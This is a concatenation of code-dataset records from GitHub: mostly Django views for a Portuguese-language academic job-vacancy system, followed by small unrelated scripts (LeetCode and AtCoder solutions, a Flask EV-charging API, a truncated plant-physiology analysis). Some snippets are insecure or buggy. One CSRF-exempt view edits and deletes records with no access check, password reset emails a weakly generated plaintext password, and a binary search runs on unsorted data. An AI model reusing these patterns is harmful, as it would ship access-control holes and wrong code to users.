mensagens.ERRO_HA_VAGAS_ATIVAS, mensagens.MSG_ERRO)\n return HttpResponseRedirect(reverse(\"Exibir_Empresa\", args={pk}))\n Vaga.objects.filter(gerente_vaga=empresa, situacao__range=(1,3)).update(situacao=4)\n empresa.user.is_active = False\n empresa.situacao = Empresa.EXCLUIDO\n empresa.save()\n empresa.user.save()\n messages.success(request, mensagens.SUCESSO_ACAO_CONFIRMADA, mensagens.MSG_SUCCESS)\n return HttpResponseRedirect('/home/')\n\n\n\ndef exibir_empresa(request, pk):\n empresa = get_object_or_404(Empresa, user_id=pk)\n if empresa.endereco is not None:\n parte = empresa.endereco.split(\",\")\n endereco = {\n 'Bairro': parte[0],\n 'Rua': parte[1] if len(parte) >= 2 else '',\n 'Numero': parte[2] if len(parte) >= 3 else '',\n 'Complemento': parte[3] if len(parte) >= 4 else '',\n 'Cidade': parte[4] if len(parte) >= 5 else '',\n 'Estado': parte[5] if len(parte) >= 6 else '',\n }\n else:\n endereco = {'Bairro': '', 'Rua': '', 'Numero': '', 'Complemento': '', 'Cidade': '', 'Estado': ''}\n context = {'empresa': empresa,\n 'endereco': endereco,\n 'form_aprovacao': FormularioAprovacao()}\n return render(request, 'sva/empresa/Perfil.html', context)\n\n\n@login_required(login_url='/accounts/login/')\n@user_passes_test(is_admin)\ndef listar_empresa(request):\n form = FormularioPesquisaEmpresa(request.POST)\n empresas = Empresa.objects.filter(situacao=Empresa.DEFERIDO)\n if form.is_valid():\n if form.cleaned_data['nome'] is not None and form.cleaned_data['nome'] != \"\":\n valor = form.cleaned_data['nome']\n query = Empresa.objects.annotate(search_name=Concat('user__first_name', Value(' '), 'user__last_name'))\n empresas = query.filter(Q(situacao=Empresa.DEFERIDO) & Q(nome__icontains=valor))\n context = {\n 'titulo_lista': 'Empresas Cadastradas',\n 'liberar_cadastro': False,\n 'form': form,\n 'empresas': empresas\n }\n return render(request, 'sva/empresa/ListarEmpresas.html', context)\n\n\n@login_required(login_url='/accounts/login/')\n@user_passes_test(is_admin)\ndef liberar_cadastro_empresas_lista(request):\n form = FormularioPesquisaEmpresa(request.POST)\n empresas = Empresa.objects.filter(situacao=Empresa.AGUARDANDO_APROVACAO)\n if form.is_valid():\n if form.cleaned_data['nome'] is not None and form.cleaned_data['nome'] != \"\":\n valor = form.cleaned_data['nome']\n query = Empresa.objects.annotate(search_name=Concat('user__first_name', Value(' '), 'user__last_name'))\n empresas = query.filter(Q(situacao=Empresa.AGUARDANDO_APROVACAO) & Q(nome__icontains=valor))\n context = {\n 'titulo_lista': 'Empresas com Cadastro Pendente',\n 'liberar_cadastro': True,\n 'form': form,\n 'empresas': empresas\n }\n return render(request, 'sva/empresa/ListarEmpresas.html', context)\n\n\n@transaction.atomic\n@login_required\n@require_POST\n@user_passes_test(is_admin)\ndef aprovar_cadastro_empresa(request, pk):\n empresa = get_object_or_404(Empresa, user__pk=pk)\n form = FormularioAprovacao(request.POST)\n if empresa is not None and form.is_valid() and form.cleaned_data['aprovado'] == 'true':\n empresa.user.is_active = True\n empresa.user.is_staff = True\n empresa.user.save()\n empresa.data_aprovacao = datetime.now()\n empresa.situacao = Empresa.DEFERIDO\n empresa.save()\n mensagem = 'Seu cadastro no SVA foi aprovado por %s. 
Segue mensagem:\\n\\n %s' \\\n 'Você agora pode acessar o sistema\\n\\nSVA' \\\n % (request.user.first_name, request.POST['justificativa'])\n send_mail('Aprovação de Cadastro - Sistema de Vagas Acadêmicas',\n mensagem, 'sva@cefetmg.br', [empresa.user.email])\n else:\n empresa.situacao = Empresa.INDEFERIDO\n empresa.data_aprovacao = None\n empresa.save()\n mensagem = 'Seu cadastro no SVA foi recusado por %s. Segue mensagem:\\n\\n%s\\n\\nSVA' \\\n % (request.user.first_name, request.POST['justificativa'])\n send_mail('Aprovação de Cadastro - Sistema de Vagas Acadêmicas',\n mensagem, 'sva@cefetmg.br', [empresa.user.email])\n messages.success(request, mensagens.SUCESSO_ACAO_CONFIRMADA, mensagens.MSG_SUCCESS)\n return render(request, 'sva/empresa/Perfil.html', {'empresa': empresa})\n\n\n###############################################################################\n# ALUNO #\n###############################################################################\n\n@transaction.atomic\n@login_required(login_url='/accounts/login/')\ndef editar_aluno(request, pk):\n if pk != str(request.user.id):\n return HttpResponseRedirect('/home/')\n aluno = get_object_or_404(Aluno,user_id=pk)\n Parte= aluno.endereco.split(\",\")\n Nome = aluno.user.first_name+' '+aluno.user.last_name\n initial = {'Rua': Parte[0],\n 'Numero': Parte[1] if len(Parte) >= 2 else '',\n 'Complemento': Parte[2] if len(Parte) >= 3 else '',\n 'Cidade': Parte[3] if len(Parte) >= 4 else '',\n 'Estado': Parte[4] if len(Parte) >= 5 else '',\n 'Nome_Completo': Nome,\n 'Email': aluno.user.email}\n if request.method == 'POST':\n form = FormularioEditarAluno(request.POST, instance=aluno, initial=initial)\n if form.is_valid():\n aluno.curso = form.cleaned_data['curso']\n aluno.telefone = form.cleaned_data['telefone']\n aluno.user.email = form.cleaned_data['Email']\n texto = form.cleaned_data['Nome_Completo']\n Nome = texto.split(\" \", 1)\n aluno.endereco = form.cleaned_data['Rua'] + ',' + \\\n form.cleaned_data['Numero'] + ',' + \\\n form.cleaned_data['Complemento'] + ',' + \\\n form.cleaned_data['Cidade'] + ',' + \\\n form.cleaned_data['Estado']\n aluno.save()\n aluno.user.first_name = Nome[0]\n if len(Nome) > 1:\n aluno.user.last_name = Nome[1]\n aluno.habilidades = form.cleaned_data['habilidades']\n aluno.user.save()\n messages.success(request, 'Editado com sucesso')\n return redirect(exibir_aluno, pk)\n else:\n form = FormularioEditarAluno(instance=aluno, initial=initial)\n return render(request, 'sva/aluno/EditarAluno.html', {'form': form})\n\n\n@login_required(login_url='/accounts/login/')\ndef excluir_aluno(request, pk):\n aluno = get_object_or_404(Aluno, user_id=pk)\n if pk != str(request.user.id):\n messages.error(request, mensagens.ERRO_PERMISSAO_NEGADA, mensagens.MSG_ERRO)\n return HttpResponseRedirect('/home/')\n if aluno is not None:\n aluno.user.is_active = False\n aluno.user.save()\n messages.success(request, mensagens.SUCESSO_ACAO_CONFIRMADA, mensagens.MSG_SUCCESS)\n return HttpResponseRedirect('/home/')\n\n\ndef exibir_aluno(request, pk):\n aluno = get_object_or_404(Aluno, user_id=pk)\n context = {'aluno': aluno}\n return render(request, 'sva/aluno/Perfil.html', context)\n\ndef upload_curriculo(request,pk):\n aluno = get_object_or_404(Aluno, user_id=pk)\n if pk != str(request.user.id):\n messages.error(request, mensagens.ERRO_PERMISSAO_NEGADA, mensagens.MSG_ERRO)\n return HttpResponseRedirect('/home/')\n if request.method == 'POST':\n form = UploadCurriculo(request.FILES)\n if form.is_valid():\n try:\n try:\n 
os.remove(aluno.curriculo.path)\n aluno.curriculo = request.FILES['curriculo']\n except:\n aluno.curriculo = request.FILES['curriculo']\n try:\n validate_file_extension(request.FILES['curriculo'])\n aluno.curriculo.name = 'Curriculo'+str(pk)+'.pdf'\n aluno.data_upload_curriculo = timezone.now()\n aluno.save()\n messages.success(request, \"Upload com sucesso\", mensagens.MSG_SUCCESS)\n return HttpResponseRedirect('/aluno/curriculo/' + str(pk))\n except:\n messages.error(request, 'Formato não aceito')\n except:\n messages.error(request,'Campo de envio não preenchido')\n else:\n form = UploadCurriculo()\n curriculo = None\n if aluno.curriculo.name != None:\n spl = aluno.curriculo.name.split(\"/\")\n\n if len(spl) == 2:\n curriculo = spl[1]\n try:\n return render(request, 'sva/aluno/curriculo.html', {'form': form,'curriculo':curriculo,'data':aluno.data_upload_curriculo,'visualizar':aluno.curriculo})\n except:\n return render(request, 'sva/aluno/curriculo.html', {'form': form,'curriculo':curriculo,'data':aluno.data_upload_curriculo,'visualizar':None})\n@login_required(login_url='/accounts/login/')\ndef excluir_curriculo(request, pk):\n aluno = get_object_or_404(Aluno, user_id=pk)\n if pk != str(request.user.id):\n messages.error(request, mensagens.ERRO_PERMISSAO_NEGADA, mensagens.MSG_ERRO)\n return HttpResponseRedirect('/home/')\n if aluno is not None:\n if os.path.isfile(aluno.curriculo.path):\n os.remove(aluno.curriculo.path)\n aluno.curriculo.name = \"\"\n aluno.save()\n messages.success(request,\"Excluido com sucesso\", mensagens.MSG_SUCCESS)\n return HttpResponseRedirect('/aluno/curriculo/'+str(pk))\n\ndef download_curriculo(request,pk):\n aluno = get_object_or_404(Aluno, user_id=pk)\n if pk != str(request.user.id):\n gerente = GerenteVaga.objects.get(user=request.user)\n if gerente is None:\n messages.error(request, mensagens.ERRO_PERMISSAO_NEGADA, mensagens.MSG_ERRO)\n return HttpResponseRedirect('/home/')\n filename = aluno.curriculo.name.split('/')[-1]\n response = HttpResponse(aluno.curriculo, content_type='text/plain')\n response['Content-Disposition'] = 'attachment; filename=%s' % filename\n\n return response\n###############################################################################\n# ACESSO #\n###############################################################################\n\n\ndef layout(request):\n form = FormularioContato()\n return render(request, 'sva/layout.html', {'form': form})\n\n\ndef recuperar_senha(request):\n if request.method == \"GET\":\n return render(request, 'registration/recuperarSenha.html', {})\n\n email = request.POST['email']\n try:\n user = User.objects.get(email=email)\n except User.DoesNotExist:\n user = None\n\n if user is not None:\n novasenha = ''.join([choice(string.ascii_letters + string.digits) for i in range(8)])\n send_mail(\n 'Recuperação de Senha - Sistema de Vagas Acadêmicas',\n 'Sua nova senha é:\\n\\n' + novasenha + '\\n\\nPara alterar para uma nova senha de sua preferência,'\n ' acesse sua conta no site sva.cefetmg.br e vá na pagina'\n ' de configurações do Usuário\\n\\nSVA',\n 'from@example.com',\n [email],\n )\n user.set_password(novasenha)\n user.save()\n messages.success(request, _('Sua nova senha foi enviado para o email a sua conta!'))\n return redirect('login')\n else:\n messages.error(request, mensagens.ERRO_EMAIL_INVALIDO, mensagens.MSG_ERRO)\n return render(request, 'registration/recuperarSenha.html', {})\n\n\ndef alterar_senha(request):\n if request.method == 'POST':\n form = PasswordChangeForm(request.user, request.POST)\n 
if form.is_valid():\n user = form.save()\n update_session_auth_hash(request, user)\n messages.success(request, _('Sua senha foi alterada com sucesso!'))\n return redirect('home')\n else:\n messages.error(request, _('Por favor, corrija os erros abaixo'))\n else:\n form = PasswordChangeForm(request.user)\n return render(request, 'registration/alterar_senha.html', {\n 'form': form\n })\n\n\n###############################################################################\n# PROFESSOR #\n###############################################################################\n\n\n@transaction.atomic\n@login_required(login_url='/accounts/login/')\ndef editar_professor(request, pk):\n professor = get_object_or_404(Professor, user__pk=pk)\n Nome = professor.user.first_name + ' ' + professor.user.last_name\n Telefone = professor.telefone\n Curso = professor.curso\n Email = professor.user.email\n initial = {\n 'Nome_Completo': Nome,\n 'telefone': Telefone,\n 'Curso': Curso,\n 'Email': Email}\n\n if request.method == 'POST':\n form = FormularioEditarProfessor(request.POST, instance=professor, initial=initial)\n if form.is_valid():\n texto = form.cleaned_data['Nome_Completo']\n Nome = texto.split(\" \", 1)\n professor.user.email = form.cleaned_data['Email']\n professor.curso = form.cleaned_data['curso']\n professor.siape = form.cleaned_data['siape']\n professor.telefone = form.cleaned_data['telefone']\n professor.save()\n professor.user.first_name = Nome[0] if len(Nome) > 0 else ''\n professor.user.last_name = Nome[1] if len(Nome) > 1 else ''\n professor.user.save()\n messages.success(request, 'Editado com sucesso!')\n return redirect(exibir_professor, professor.user.id)\n else:\n form = FormularioEditarProfessor(instance=professor, initial=initial)\n return render(request, 'sva/professor/EditarProfessor.html', {'form': form, 'professor': professor})\n\n\n@transaction.atomic\n@login_required(login_url='/accounts/login/')\ndef excluir_professor(request, pk):\n professor = get_object_or_404(Professor, user__pk=pk)\n if pk != str(request.user.id):\n messages.error(request, mensagens.ERRO_PERMISSAO_NEGADA, mensagens.MSG_ERRO)\n return HttpResponseRedirect('/home/')\n\n vagas = Vaga.objects.filter(gerente_vaga=professor)\n do_not_execute = False\n for vaga in vagas:\n if vaga.vencida is False and vaga.situacao == 3:\n do_not_execute = True\n if do_not_execute is False:\n Vaga.objects.filter(gerente_vaga=professor, situacao__range=(1,3)).update(situacao=4)\n professor.user.is_active = False\n professor.situacao = Professor.EXCLUIDO\n professor.user.save()\n professor.save()\n messages.error(request, mensagens.SUCESSO_ACAO_CONFIRMADA, mensagens.MSG_SUCCESS)\n return HttpResponseRedirect('/home/')\n else:\n messages.error(request, mensagens.ERRO_HA_VAGAS_ATIVAS, mensagens.MSG_ERRO)\n return HttpResponseRedirect('/home/')\n\n@login_required(login_url=\"/home/\")\ndef Listar_Vagas_Aluno(request, pk):\n aluno = get_object_or_404(Aluno, user_id=pk)\n if pk != str(request.user.id):\n messages.error(request, mensagens.ERRO_PERMISSAO_NEGADA, mensagens.MSG_ERRO)\n return HttpResponseRedirect('/home/')\n form = FormularioPesquisaVagasAluno(request.POST)\n context = {}\n context['form']=form\n if form.is_valid():\n if form.cleaned_data['Area_Atuacao']==\"\":\n context['vagas_inscritas'] = Vaga.objects.filter(alunos_inscritos=aluno,titulo__icontains= form.cleaned_data['Vaga_Cadastrada'])\n context['vagas_interesse'] = Vaga.objects.filter(alunos_interessados=aluno,titulo__icontains=form.cleaned_data['Vaga_Cadastrada'])\n elif 
form.cleaned_data['Vaga_Cadastrada']==\"\":\n areas=AreaAtuacao.objects.filter(nome__icontains= form.cleaned_data['Area_Atuacao'])\n for area in areas:\n context['vagas_inscritas'] = Vaga.objects.filter(alunos_inscritos=aluno, areas_atuacao=area.id)\n context['vagas_interesse'] = Vaga.objects.filter(alunos_interessados=aluno, areas_atuacao=area.id)\n else:\n areas = AreaAtuacao.objects.filter(nome__icontains=form.cleaned_data['Area_Atuacao'])\n for area in areas:\n context['vagas_inscritas'] = Vaga.objects.filter(alunos_inscritos=aluno,titulo__icontains= form.cleaned_data['Vaga_Cadastrada'], areas_atuacao=area.id)\n context['vagas_interesse'] = Vaga.objects.filter(alunos_interessados=aluno,titulo__icontains= form.cleaned_data['Vaga_Cadastrada'], areas_atuacao=area.id)\n else:\n context['vagas'] = Vaga.objects.filter(alunos_inscritos=aluno)\n context['now']= timezone.now()\n return render(request, 'sva/aluno/Vagas.html', context)\n\n\n@login_required(login_url='/accounts/login/')\ndef exibir_professor(request, pk):\n professor = get_object_or_404(Professor, user_id=pk)\n context = {'professor': professor,\n 'form_aprovacao': FormularioAprovacao()}\n return render(request, 'sva/professor/Perfil.html', context)\n\n\n@login_required(login_url='/accounts/login/')\ndef listar_professor(request):\n form = FormularioPesquisaProfessor(request.POST)\n professores = professores = Professor.objects.filter(situacao=Professor.DEFERIDO)\n if form.is_valid():\n if form.cleaned_data['curso_campus_nome'] is not None and form.cleaned_data['curso_campus_nome'] != \"\":\n valor = form.cleaned_data['curso_campus_nome']\n query = Professor.objects.annotate(search_name=Concat('user__first_name', Value(' '), 'user__last_name'))\n professores = query.filter(Q(situacao=Professor.DEFERIDO) & (\n Q(search_name__icontains=valor) |\n Q(curso__nome__icontains=valor) |\n Q(curso__campus__nome__icontains=valor)))\n context = {\n 'titulo_lista': 'Professores Cadastrados',\n 'liberar_cadastro': False,\n 'form': form,\n 'professores': professores,\n 'people': ProfessorTable(),\n }\n return render(request, 'sva/professor/ListarProfessores.html', context)\n\n\n@login_required(login_url='/accounts/login/')\n@user_passes_test(is_admin)\ndef liberar_cadastro_professores_lista(request):\n form = FormularioPesquisaProfessor(request.POST)\n professores = Professor.objects.filter(situacao=Professor.AGUARDANDO_APROVACAO)\n if form.is_valid():\n if form.cleaned_data['curso_campus_nome'] is not None and form.cleaned_data['curso_campus_nome'] != \"\":\n valor = form.cleaned_data['curso_campus_nome']\n query = Professor.objects.annotate(search_name=Concat('user__first_name', Value(' '), 'user__last_name'))\n professores = query.filter(Q(situacao=Professor.AGUARDANDO_APROVACAO) & (\n Q(search_name__icontains=valor) |\n Q(curso__nome__icontains=valor) |\n Q(curso__campus__nome__icontains=valor)))\n context = {\n 'titulo_lista': 'Professores com Cadastro Pendente',\n 'liberar_cadastro': True,\n 'form': form,\n 'professores': professores,\n 'people': ProfessorTable(),\n }\n return render(request, 'sva/professor/ListarProfessores.html', context)\n\n\n@transaction.atomic\n@login_required\n@require_POST\n@user_passes_test(is_admin)\ndef aprovar_cadastro_professor(request, pk):\n professor = get_object_or_404(Professor, user__pk=pk)\n form = FormularioAprovacao(request.POST)\n if professor is not None and form.is_valid() and form.cleaned_data['aprovado'] == 'true':\n professor.user.is_active = True\n professor.user.is_staff = True\n 
professor.user.save()\n professor.data_aprovacao = datetime.now()\n professor.situacao = Professor.DEFERIDO\n professor.save()\n mensagem = 'Seu cadastro no SVA foi aprovado por %s. Segue mensagem:\\n\\n %s' \\\n 'Você agora pode acessar o sistema\\n\\nSVA' \\\n % (request.user.first_name, form.cleaned_data['justificativa'])\n send_mail('Aprovação de Cadastro - Sistema de Vagas Acadêmicas',\n mensagem, 'sva@cefetmg.br', [professor.user.email])\n else:\n professor.situacao = Professor.INDEFERIDO\n professor.data_aprovacao = None\n professor.save()\n mensagem = 'Seu cadastro no SVA foi recusado por %s. Segue mensagem:\\n\\n%s\\n\\nSVA' \\\n % (request.user.first_name, form.cleaned_data['justificativa'])\n send_mail('Recusa de Cadastro - Sistema de Vagas Acadêmicas',\n mensagem, 'sva@cefetmg.br', [professor.user.email])\n messages.success(request, mensagens.SUCESSO_ACAO_CONFIRMADA, mensagens.MSG_SUCCESS)\n return render(request, 'sva/professor/Perfil.html', {'professor': professor})\n\n\n@transaction.atomic\ndef acessar_notificacao(request):\n pk = request.GET.get('pk', None)\n notificacao = Notificacao.objects.get(pk=pk) if pk or pk!='' else None\n if not notificacao:\n data = {'erro': True}\n return JsonResponse(data)\n notificacao.lida = True\n notificacao.data_leitura = datetime.now()\n notificacao.save()\n data = {\n 'sucesso': True,\n 'id_link': 'notflink-%d' % notificacao.pk,\n 'link': notificacao.link\n }\n return JsonResponse(data)\n\n@csrf_exempt\ndef gerenciar_areaatuacao(request):\n context={}\n areas=AreaAtuacao.objects.filter(situacao=\"DEFERIDO\");\n areasaaprovar=AreaAtuacao.objects.filter(situacao=\"AGUARDANDO_APROVACAO\");\n context['areas'] = areas\n context['areasaaprovar'] = areasaaprovar\n\n if request.is_ajax():\n if(request.POST['type']==\"edit\"):\n area=AreaAtuacao.objects.get(id=int(request.POST['id']))\n contareas = AreaAtuacao.objects.filter(nome=request.POST['data'], situacao=\"DEFERIDO\").count()\n contareas = contareas + AreaAtuacao.objects.filter(nome=request.POST['data'], situacao=\"INDEFERIDO\").count()\n if area.nome == request.POST['data']:\n contareas = contareas-1;\n if contareas:\n messages.success(request, 'Área de atuação já adicionada!', mensagens.MSG_ERRO)\n return redirect(gerenciar_areaatuacao)\n area.nome=request.POST['data']\n # messages.success(request, 'Área de atuação editada com sucesso!', mensagens.MSG_SUCCESS)\n area.save()\n # return redirect(gerenciar_areaatuacao)\n if (request.POST['type']==\"delete\"):\n AreaAtuacao.objects.get(id=int(request.POST['id'])).delete()\n # messages.success(request, 'Área de atuação removida com sucesso!', mensagens.MSG_SUCCESS)\n # return redirect(gerenciar_areaatuacao)\n if (request.POST['type'] == \"deferida\"):\n area = AreaAtuacao.objects.get(id=int(request.POST['id']))\n area.situacao = \"DEFERIDO\"\n # messages.success(request, 'Área de atuação aprovada com sucesso!', mensagens.MSG_SUCCESS)\n area.save()\n areas = AreaAtuacao.objects.filter(situacao=\"DEFERIDO\");\n areasaaprovar = AreaAtuacao.objects.filter(situacao=\"AGUARDANDO_APROVACAO\");\n context['areas'] = areas\n context['areasaaprovar'] = areasaaprovar\n return redirect(gerenciar_areaatuacao)\n\n if request.method == 'POST':\n novaarea = AreaAtuacao()\n if AreaAtuacao.objects.filter(nome=request.POST['new_text']).exists():\n messages.error(request, _('Essa área de atuação já existe'), mensagens.MSG_ERRO)\n return redirect(gerenciar_areaatuacao)\n if request.POST.get('new_text','').isspace() or request.POST.get('new_text','') is '':\n 
messages.error(request, _('Entrada inválida'), mensagens.MSG_ERRO)\n return redirect(gerenciar_areaatuacao)\n novaarea.nome = request.POST.get('new_text','').strip()\n novaarea.situacao=\"DEFERIDO\"\n novaarea.save()\n messages.success(request, 'Área de atuação criada com sucesso!',mensagens.MSG_SUCCESS)\n return redirect(gerenciar_areaatuacao)\n\n return render(request, 'sva/vaga/GerenciarAreaAtuacao.html',context)\n\ndef render_to_json(request, data):\n return HttpResponse(\n json.dumps(data, ensure_ascii=False),\n mimetype=request.is_ajax() and \"application/json\" or \"text/html\"\n )\n","repo_name":"gustavohsborba/SVA","sub_path":"sva/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":73031,"program_lang":"python","lang":"pt","doc_type":"code","stars":2,"dataset":"github-code","pt":"81"} +{"seq_id":"811596703","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution:\n def reverseList(self, head: Optional[ListNode]) -> Optional[ListNode]:\n previous = None # A\n current = head # B\n while current:\n next_node = current.next \n current.next = previous # B.next = a \n previous = current # A = B \n current = next_node # B = C \n\n return previous\n \n \n","repo_name":"BambinoRiya/PythonClass","sub_path":"reverseLinkedList.py","file_name":"reverseLinkedList.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"73295764106","text":"from flask import Blueprint, jsonify, Response, request,json\r\nfrom .models import Provider,Charge,Station,ChargingPoint\r\nimport datetime\r\nfrom .authorization import requires_auth\r\nfrom .jsontocsv import json2csv\r\nfrom flask import make_response\r\nfrom sqlalchemy import and_\r\nfrom flask_cors import cross_origin\r\n\r\nbp = Blueprint(\"sessionsperprovider\", __name__, url_prefix=\"/evcharge/api/SessionsPerProvider\")\r\n\r\ncsv_first_row = [\"ProviderID\",\"ProviderName\",\"StationID\",\"SessionID\",\"VehicleID\",\"StartedOn\",\"FinishedOn\",\"EnergyDelivered\",\"PricePolicyRef\",\"CostPerKWh\",\"TotalCost\"]\r\n\r\n\r\n@bp.route('///', methods=['GET'])\r\n@cross_origin(supports_credentials=True)\r\n@requires_auth\r\ndef sessionsperpoint(_,providerID,date_from,date_to):\r\n format = request.args.get('format')\r\n reqtime = request.args.get('time')\r\n csvbool = False\r\n if format == 'csv': csvbool = True\r\n try: dtf = datetime.datetime.strptime(date_from, '%Y-%m-%d')\r\n except: return make_response('Not valid date format (YYYY-MM-DD)', 400)\r\n try:\r\n dto = datetime.datetime.strptime(date_to, '%Y-%m-%d')\r\n except:\r\n return make_response('Not valid date format (YYYY-MM-DD)', 400)\r\n\r\n res = Provider.query.filter_by(id = providerID).first()\r\n if not res:\r\n return make_response('The Provider ID is invalid or doesnt exist', 400)\r\n res_id = res.id\r\n res_name = res.name_\r\n\r\n sessionsquery1 = Charge.query.filter(Charge.provider_id == providerID).order_by(Charge.date_).filter(Charge.date_.between(date_from,date_to)).all()\r\n sessionsquery2 = sessionsquery1\r\n\r\n if not sessionsquery2:\r\n return make_response('There are no sessions for this provider', 402)\r\n \r\n records = []\r\n for record in sessionsquery2:\r\n staid = ChargingPoint.query.filter_by(id = record.chargingpoint_id).first()\r\n if not staid: return make_response('Station doesnt exist', 402)\r\n\r\n \"\"\"\r\n pay = 
Transaction.query.filter_by(id=record.id).first()\r\n if not pay: return make_response('Transaction doesnt exist', 403)\r\n \"\"\"\r\n extra = {\"ProviderID\":str(res_id),\"ProviderName\":str(res_name),\"StationID\":str(staid.station_id),\r\n \"SessionID\":str(record.id),\"VehicleID\":str(record.vehicle_id), \"StartedOn\":str(record.connection_time),\r\n \"FinishedOn\":str(record.disconnection_time),\"EnergyDelivered\":str(record.kWhdelivered),\r\n \"PricePolicyRef\":str(\"null\"),\"CostPerKWh\":str(record.cost_per_kwh),\"TotalCost\":str(record.total_cost)}\r\n records.append(extra)\r\n\r\n if csvbool:\r\n csv_response = json2csv(records, csv_first_row)\r\n return Response(csv_response, mimetype='text/csv')\r\n else:\r\n return Response(json.dumps(records, sort_keys=False), mimetype='application/json')\r\n","repo_name":"LefterisLymp/SoftEng2020-21","sub_path":"back-end/app/sessionsperprovider.py","file_name":"sessionsperprovider.py","file_ext":"py","file_size_in_byte":2801,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"10440709935","text":"# Simple Calculator: Create a basic calculator program that takes two numbers as input and allows the user to choose an operation (addition, subtraction, multiplication, division) to perform. Display the result using print() \n\n\n\n\nnum1=float(input(\"enter the first number:\"))\nnum2=float(input(\"enter the second number:\"))\n\noperators=input(\"+ - / * \")\n\nif operators == \"+\": \n print(round(num1+num2,))\n\nelif operators == \"-\":\n print(round(num1-num2))\n\nelif operators == \"*\":\n print(round(num1*num2))\n\nelif operators == \"/\":\n if num2 == 0:\n print(\"cannot divide by zero\")\n\n else:\n print(num1/num2)\n\nelse:\n print(\"enter the valid numbers\")\n \n","repo_name":"shiixxam/python_in_30_days","sub_path":"python/DAY2/input & output/Q2.py","file_name":"Q2.py","file_ext":"py","file_size_in_byte":674,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"7757195615","text":"from django.core.exceptions import PermissionDenied\nfrom django.http import HttpRequest, HttpResponse\n\nfrom sales.models import Sellers\n\n\ndef check_seller_superuser(request: HttpRequest) -> HttpResponse:\n is_seller = False\n try:\n if Sellers.objects.filter(user=request.user):\n is_seller = True\n if request.user.is_authenticated:\n if request.user.is_superuser or is_seller:\n request.is_ok = True\n return request\n except TypeError: PermissionDenied\n","repo_name":"bakefayat/sales_plan","sub_path":"core/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":518,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"23696370808","text":"import sys\nsys.setrecursionlimit(10**7)\ninput = lambda: sys.stdin.readline().strip()\n\ndef main():\n N = int(input())\n S_list = [input() for _ in range(N)]\n print(len(list(set(S_list))))\n\nmain()\n","repo_name":"memen10/atcoder","sub_path":"ABC/abc164/c/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":202,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"17807629936","text":"from typing import List\n\ndef binarySearch (arr: List, l, r, x):\n if r >= l:\n # Check base case\n mid = l + (r - l) / 2\n mid = round(mid)\n mid = int(mid)\n if arr[mid] == x:\n # If element is present at the middle itself \n return mid\n elif arr[mid] > x:\n # If element is 
smaller than mid, then it \n # can only be present in left subarray \n return binarySearch(arr, l, mid - 1, x) \n else:\n # Else the element can only be present \n # in right subarray \n return binarySearch(arr, mid + 1, r, x) \n\n else: \n # Element is not present in the array \n return -1\n\n# Test ray \narr = [12, 93, 24, 40, 81, 77, 95]\nx = 77\n\n# Function call \nresult = binarySearch(arr, 0, len(arr) - 1, x) \n\nif result != -1: \n print(f\"Element is present at index {result}\")\nelse: \n print(\"Element is not present in array\")","repo_name":"Cyber-Netic/CIS.303.Final-Project","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":948,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"7826059614","text":"class Solution:\n def lengthOfLongestSubstring(self, s: str) -> int:\n # longest, start = 0, 0\n # hashmap = {}\n # for i, c in enumerate(s):\n # if c in hashmap and start <= hashmap[c]:\n # start = hashmap[c] + 1\n # else:\n # longest = max(longest, i-start+1) \n # hashmap[c] = i \n # return longest \n\n hashset = set()\n res = 0\n left = 0\n\n for i in range(len(s)):\n while s[i] in hashset:\n hashset.remove(s[left])\n left += 1\n hashset.add(s[i])\n \n res = max(res, len(hashset))\n\n return res\n\n\n \n \n","repo_name":"johnteye/A2SV--Onboarding-Phase","sub_path":"LongestSubstringwithoutRepeatingChar.py","file_name":"LongestSubstringwithoutRepeatingChar.py","file_ext":"py","file_size_in_byte":714,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"41655679846","text":"import os\nimport sys\nimport pandas as pd\nfrom pickle import dump, load\nimport numpy as np\nfrom gs_models import *\nfrom fit_gs_params import *\nfrom lmfit import Parameters\n\nsel = 'revision_0'\n\nres_dir = '../../DATA/EEGS/fitted_models_%s' % sel\nres_dir_2 = '../../DATA/EEGS/results_params'\n\nfig_dir = '../../PROJECTS/Stomatal_conductance_eval/results_figures/2_param_uncertainty'\nsites_params = pd.read_csv( '../../DATA/EEGS/sel2_sites_params.csv')\n\nparams_by_models = [['WUE_d', ['lww', 'b']],\n ['CM_d2', ['b1', 'b2']],\n ['CM_d4', ['b1', 'b2', 'a', 'psi_50']],\n ['SOX_d1', ['kmax', ]],\n ['SOX_d3', ['kmax', 'a', 'psi_50']],\n ['WUE_i', ['lww', 'b']],\n ['CM_i4', ['b1', 'b2', 'a', 'psi_50']],\n ['SOX_i3', ['kmax', 'a', 'psi_50']],\n ]\n\nmod_list = ['WUE_d', 'CM_d2', 'CM_d4', 'SOX_d1', 'SOX_d3', 'WUE_i', 'CM_i4', 'SOX_i3']\n\npft_list = ['NF', 'BF', 'G-C3', 'C-C3']\nsites = sites_params['site_id'].values\n\ndef by_site_params(f_name):\n out_file_m = os.path.join(res_dir_2, f_name)\n all_params = [] \n for site_i in sites:\n print (site_i)\n site_p = []\n pft = sites_params[sites_params['site_id'] == site_i]['pft'].values[0]\n pickle_file = [os.path.join(res_dir, fi) for fi in os.listdir(res_dir) \n if fi.endswith('pickle') \n and (site_i in fi)][0]\n data_file = [os.path.join(res_dir, fi) for fi in os.listdir(res_dir) \n if fi.endswith('bs.csv')\n and (site_i in fi)][0]\n with open(pickle_file, 'rb') as fp:\n df = load(fp)\n \n data_i = pd.read_csv(data_file,\n header=0, index_col=0,\n parse_dates=True,\n infer_datetime_format=True)\n \n psi_min = 